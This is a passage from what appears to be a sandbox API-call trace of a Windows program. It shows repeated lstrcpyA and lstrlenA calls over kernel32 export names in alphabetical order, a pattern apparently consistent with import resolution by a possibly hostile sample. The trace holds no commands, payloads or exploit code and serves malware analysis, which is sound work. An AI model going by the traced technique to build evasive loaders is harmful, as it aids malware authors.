(in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.817] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.817] lstrlenA (lpString="ADDATOMA") returned 8 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.817] lstrlenA (lpString="ADDATOMW") returned 8 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.817] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.817] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.817] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.817] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.817] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.817] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.817] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.818] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.818] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.818] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.818] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.818] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.818] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.818] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.818] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.818] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.818] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.818] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.818] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.818] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.818] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.818] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.818] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.818] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.818] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.818] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.819] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.819] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.819] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.819] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.819] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.819] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.819] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.819] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.819] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.819] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.819] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.819] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.819] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.819] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.819] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.819] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.819] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.819] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.819] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.820] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.820] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.820] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.820] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.820] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.820] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.820] lstrlenA (lpString="BEEP") returned 4 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.820] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.820] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.820] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.820] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.820] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.820] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.820] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.820] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.820] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.820] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.820] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.820] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.821] lstrlenA (lpString="CANCELIO") returned 8 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.821] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.821] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.821] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.821] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.821] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.821] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.821] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.821] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.821] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.821] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.821] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.821] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.821] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.821] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.821] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.821] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.821] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.822] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.822] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.822] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.822] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.822] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.822] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.822] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.822] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.822] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.822] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.822] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.822] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.822] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.822] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.822] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.822] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.822] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.822] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.823] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.823] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.823] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.823] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.823] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.823] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.823] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.823] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.823] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.823] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.823] lstrlenA (lpString="COPYFILEA") returned 9 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.823] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.823] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.823] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.823] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.823] lstrlenA (lpString="COPYFILEW") returned 9 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.823] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.823] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.824] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.824] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.824] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.824] lstrlenA 